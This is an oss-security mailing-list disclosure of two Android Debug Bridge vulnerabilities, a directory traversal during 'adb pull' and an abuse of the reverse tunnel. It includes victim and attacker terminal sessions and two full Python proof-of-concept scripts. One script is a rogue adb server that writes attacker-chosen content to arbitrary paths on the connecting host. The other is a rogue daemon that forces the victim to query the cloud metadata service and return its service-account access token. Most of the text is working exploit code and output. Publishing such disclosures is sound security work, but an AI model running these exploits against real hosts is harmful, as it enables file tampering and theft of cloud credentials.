[prev in list] [next in list] [prev in thread] [next in thread] 

List:       oss-security
Subject:    [oss-security] android debug bridge (adb) reverse connection and directory traversal
From:       Imre Rad <radimre83 () gmail ! com>
Date:       2022-10-25 13:52:53
Message-ID: CAPWzz4zTnbgP28eppkhPkMPSG7zCWLMrbvg4LsToU0pSRQ74JQ () mail ! gmail ! com
[Download RAW message or body]

Platform Tools v33.0.3
(https://developer.android.com/studio/releases/platform-tools)
released in August addresses two security issues in Android Debug
Bridge. Both require the adb host (e.g. the PC) to connect to a
compromised adb daemon (e.g. the mobile phone). This is a security
concern for example in automated environments or malware labs that run
arbitrary android packages by design.
I found and reported these issues to Google last December.

CVE-2022-20128:
Adb was vulnerable to directory traversal attacks during adb pull
operation. Example session (victim side):

root@eedd4cb8b202:/tmp/platform-tools# cat /etc/proof
cat: /etc/proof: No such file or directory

root@eedd4cb8b202:/tmp/platform-tools# ./adb connect 10.6.8.145:5111
* daemon not running; starting now at tcp:5037
* daemon started successfully
connected to 10.6.8.145:5111

root@eedd4cb8b202:/tmp/platform-tools# ./adb devices
List of devices attached
10.6.8.145:5111  device

root@eedd4cb8b202:/tmp/platform-tools# ./adb pull /data/local/tmp/1 /tmp/sd=
fsdf
/data/local/tmp/1/: 1 file pulled, 0 skipped. 0.0 MB/s (11 bytes in 0.150s)

root@eedd4cb8b202:/tmp/platform-tools# cat /etc/proof
hello world


PoC code: https://github.com/irsl/CVE-2022-20128 (also attached here)


CVE-2022-3168:
The reverse tunnel feature in Android Debug Bridge (adb) was
vulnerable as it allowed malicious adb daemons to open connections to
arbitrary host/ports and unix domain sockets on the host.

Example session; both sides running on Google Cloud virtual machines
for sake of demonstration. Attacker receives the access token of the
service account the victim VM is running as.

Victim:

$ adb connect 10.128.0.5:5556
connected to 10.128.0.5:5556

Attacker side:

$ ./adb_rogue_daemon.py

...
Wooho, we got response for our rouge request!
b'HTTP/1.0 200 OK\r\nMetadata-Flavor: Google\r\nContent-Type:
application/json\r\nDate: Thu, 04 Nov 2021 22:31:21 GMT\r\nServer:
Metadata Server for VM\r\nConnection: Close\r\nContent-Length:
1049\r\nX-XSS-Protection: 0\r\nX-Frame-Options:
SAMEORIGIN\r\n\r\n{"access_token":"ya29.c.KpgBFghLV[redacted]..............=
...........................................................................=
...........................................................................=
...........................................................................=
...........................................................................=
..........................................................................

PoC code: https://github.com/irsl/CVE-2022-3168-adb-unexpected-reverse-forw=
ards
(also attached here)


Regards,
Imre

["adbdirtrav.py" (text/plain)]

#!/usr/bin/env python3

# This is a dummy, syncronous ADB server written in pure Python by Imre Rad.
# The tool demonstrates a directory traversal vulnerability in the adb implementation.

import os
import sys
import socketserver
import argparse
import unittest
import struct
from collections import namedtuple

LISTEN_PORT = 5555
DESTINATION_PATH = "/etc/proof"
CONTENT = "hello world"

CMD_CNXN = "CNXN"
CMD_OPEN = "OPEN"
CMD_WRTE = "WRTE"
CMD_CLSE = "CLSE"
CMD_OKAY = "OKAY"

Channel = namedtuple("Channel", ["local", "remote", "handler"])

trace_mode = os.getenv("TRACE")
debug_mode = os.getenv("DEBUG")

def calc_adb_checksum(payload : bytes):
    sum = 0
    for b in payload:
        sum = (sum + b) & 0xffffffff
    return sum

class Tests(unittest.TestCase):
    def test_checksum(self):
        ls = bytes("a" * 10000000, "utf-8")
        c = calc_adb_checksum(ls)
        self.assertEqual(c, 0x39d10680)

def eprint(*args, **kwargs):
    print(*args, **kwargs, file=sys.stderr)
def tprint(*args, **kwargs):
    if not trace_mode:
        return       
    eprint(*args, **kwargs)
def dprint(*args, **kwargs):
    if not debug_mode:
        return       
    eprint(*args, **kwargs)

def myrecv(socket):
    r = socket.recv(1024)
    tprint("raw recv:", r)
    return r

def mysend(socket, payload):
    tprint("raw send:", payload)
    return socket.sendall(payload)
    
        
class AdbHandler(socketserver.BaseRequestHandler):
    # this is a map from local to remote channel ids
    last_channel_id = 0
    channels = {}

    def _recv(self):
        return myrecv(self.request)
    def _send(self, payload):
        return mysend(self.request, payload)
        
    def adbsend(self, cmd : str, arg0, arg1, payload = b""):
        cmd_bytes = cmd.encode("utf-8")
        cmd_int = struct.unpack("I", cmd_bytes)[0]
        magic_int = cmd_int ^ 0xffffffff
        magic_bytes = struct.pack("I", magic_int)
        checksum_int = calc_adb_checksum(payload)
        checksum_bytes = struct.pack("I", checksum_int)
        arg0_bytes = struct.pack("I", arg0)
        arg1_bytes = struct.pack("I", arg1)
        length_bytes = struct.pack("I", len(payload))
        dprint("send", "cmd:", cmd, "arg0:", arg0, "arg1:", arg1, "payload length:", \
len(payload), "payload:", payload)  
        full = cmd_bytes + arg0_bytes + arg1_bytes + length_bytes + checksum_bytes + \
magic_bytes + payload  return self._send(full)

    def handle(self):
        r = b""
        while True:
            a = self._recv()
            if not a:
                return # EOF
            r += a
            if len(r) < 24:
                raise ValueError("Unexpectedly short message")

            while len(r) > 0:
                command_str = r[0:4].decode("utf-8")
                arg0 = struct.unpack("I", r[4:8])[0]
                arg1 = struct.unpack("I", r[8:12])[0]
                plen =  struct.unpack("I", r[12:16])[0]
                if len(r) < 24+plen:
                    break # need to read more
                payload = r[24:24+plen]
                r = r[24+plen:]

                dprint("recv", "cmd:", command_str, "arg0:", arg0, "arg1:", arg1, "payload \
length:", len(payload), "payload:", payload)

                handler_str = "h_"+command_str
                if not hasattr(self, handler_str):
                    raise ValueError("Unsupported message: "+command_str)
                
                getattr(self, handler_str)(arg0, arg1, payload)
        # reading the initial banner of the client (CNXN ...)
        
        
    def h_CNXN(self, arg0, arg1, payload):
        # 00 00 00 01  00 00 04 00
        return self.adbsend(CMD_CNXN, 0x01000000, 0x00040000, \
b"device::ro.product.name=sdk_phone_x86;ro.product.model=Android SDK built for \
x86;ro.product.device=generic_x86;\x00")

    def h_OPEN(self, arg0, arg1, payload):
        payload_str = payload.decode("utf-8").rstrip('\x00')
        if payload_str != "sync:":
            raise ValueError("Unsupported service request "+payload_str.encode("utf-8").hex())
        # the pull cmd is opening a sync service
        self.last_channel_id += 1
        remote_channel_id = arg0
        local_channel_id = self.last_channel_id
        self.channels[remote_channel_id] =  Channel(local_channel_id, remote_channel_id, \
self.service_sync)  self.adbsend(CMD_OKAY, self.last_channel_id, arg0)

    def h_WRTE(self, arg0, arg1, payload):
        ch = self.channels.get(arg0)
        if not ch:
            raise ValueError("Client attempted to write to a channel that does not exist", \
                arg0, arg1)
        # we always acknowledge with an OKAY packet, then comes with the service level response
        return self.adbsend(CMD_OKAY, ch.local, ch.remote) or \
               ch.handler(arg0, arg1, payload)
        
    def h_OKAY(self, arg0, arg1, payload):
        # we just swallow
        pass

    def h_CLSE(self, arg0, arg1, payload):
        tprint("CLSE", arg0, arg1, self.channels)
        self.channels.pop(arg1, None)
        
    def service_sync(self, local_channel_id, remote_channel_id, payload):
        command_str = payload[0:4].decode("utf-8")
        rest = payload[4:]
        handler_str = "s_sync_"+command_str
        if not hasattr(self, handler_str):
            raise ValueError("Unsupported sync service message: "+command_str)
        getattr(self, handler_str)(local_channel_id, remote_channel_id, rest)

    def s_sync_LIST(self, local_channel_id, remote_channel_id, payload):
        # adb is asking whether the thing is is about to pull is a directory or a file. We \
always report a directory no matter what it wants.  filename = "../../../../../" + \
self.server.args.destination_path  filename_bytes = filename.encode("utf-8")
        length_bytes = struct.pack("I", len(filename_bytes))
        
        list_rogue = b"DENT" + bytes.fromhex("b6 81 00 00 04  00 00 00 36 8d c9 61") + \
                length_bytes + filename_bytes
        list_done = b"DONE\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
        return self.adbsend(CMD_WRTE, remote_channel_id, local_channel_id, list_rogue + \
list_done)

    def s_sync_STAT(self, local_channel_id, remote_channel_id, payload):
        self.adbsend(CMD_WRTE, remote_channel_id, local_channel_id, bytes.fromhex("53 54 41 54 \
ff 41 00 00 00 10 00 00 36 8d c9 61"))

    def s_sync_RECV(self, local_channel_id, remote_channel_id, payload):
        requested_filename = payload[4:].decode("utf-8")
        if not ".." in requested_filename:
            raise ValueError("Attack failed; the client is requesting a file we did not \
                expect")
        print("Attack worked, client is requesting the file with .. in the name!") # goes to \
stdout to distinguish this from protocol level noise  content_length = \
len(self.server.args.content)  content_length_bytes = struct.pack("I", content_length)
        content_bytes = self.server.args.content.encode("utf-8")
        return self.adbsend(CMD_WRTE, remote_channel_id, local_channel_id, b"DATA" + \
                content_length_bytes) or \
               self.adbsend(CMD_WRTE, remote_channel_id, local_channel_id, content_bytes + \
b"DONE\x00\x00\x00\x00")  
    def s_sync_QUIT(self, local_channel_id, remote_channel_id, payload):
        return self.adbsend(CMD_CLSE, remote_channel_id, local_channel_id)

if __name__ == "__main__":
    if os.getenv("TEST"):
        unittest.main()
        sys.exit(0)

    parser = argparse.ArgumentParser()
    parser.add_argument("-lp", "--listen-port", type=int, default=LISTEN_PORT, help="The \
listening port")  parser.add_argument("-dp", "--destination-path", default=DESTINATION_PATH, \
help="The path to drop the payload on the adb client")  parser.add_argument("-c", "--content", \
default=CONTENT, help="The content to send to --destination-path")  args = parser.parse_args()

    socketserver.TCPServer.allow_reuse_address = True
    with socketserver.TCPServer(("0.0.0.0", args.listen_port), AdbHandler) as t:
        t.args = args
        t.serve_forever()


["adb_rogue_daemon.py" (text/plain)]

#!/usr/bin/env python3


import socket
import adb_shell
from adb_shell import adb_message
from builtins import bytes

HOST = '0.0.0.0'  # Standard loopback interface address (localhost)
PORT = 5556        # Port to listen on (non-privileged ports are > 1023)

LOCAL_ID = 1234
TARGET = b'169.254.169.254:80' # b"127.0.0.1:1111"
HTTP_REQUEST = b"GET /computeMetadata/v1/instance/service-accounts/default/token \
HTTP/1.0\r\nHost: "+TARGET+b"\r\nMetadata-Flavor: Google\r\n\r\n"

def pack(cmd, arg0, arg1, payload):
    header = adb_message.AdbMessage(cmd, arg0, arg1, payload).pack()
    return header+payload

A_CNXN = pack(
    adb_shell.constants.CNXN,
    16777216, # version
    262144, # max_data
    b'host::features=stat_v2,cmd,shell_v2'
)

A_OPEN_METADATA = pack(
    adb_shell.constants.OPEN,
    LOCAL_ID, # local-id
    0, # constant, unused
    b'tcp:'+TARGET+b'\x00' # destination; 
                           # TODO: test local:... target - no idea if that would work
                           # TODO: verify what happens if we "forget" sending the trailing \x00
)


def unpack(data):
    print(data)
    header = data[0:24]
    payload = data[24:]
    unpacked = adb_message.unpack(header)
    # cmd, arg0, arg1, data_length, checksum
    payload = payload[0:unpacked[3]]
    cmd_str = adb_message.int_to_cmd(unpacked[0]).decode("utf-8")
    return (cmd_str, unpacked, payload)

def do_read(conn):
    data = conn.recv(1024)
    if not data:
        return
    print("<<<", data)
    parsed = unpack(data)
    print(parsed)
    return parsed
    
def do_send(conn, data):
    print(">>>", data)
    conn.sendall(data)

def do_the_job():
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        s.bind((HOST, PORT))
        s.listen()
        print("Listening on", HOST, PORT)
        while True:
            conn, addr = s.accept()
            with conn:
                print('Connected by', addr)
                request_sent = False
                while True:
                    data = do_read(conn)
                    if not data:
                        break
                    if data[0] == "CNXN":
                        print("Accepting the incoming connection without authentication")
                        do_send(conn, A_CNXN)
                        print("And also asking the remote adb client to kindly connect to our \
target")  do_send(conn, A_OPEN_METADATA)
                    if data[0] == "OKAY" and not request_sent:
                        print("The connection has established!")
                        remote_id = data[1][1]
                        do_send(conn, pack(adb_shell.constants.WRTE, LOCAL_ID, remote_id, \
HTTP_REQUEST))  request_sent = True
                    if data[0] == "WRTE":
                        print("Wooho, we got response for our rouge request!")
                        print(data[2])
            print("Connection closed")

if __name__ == "__main__":
    do_the_job()



[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic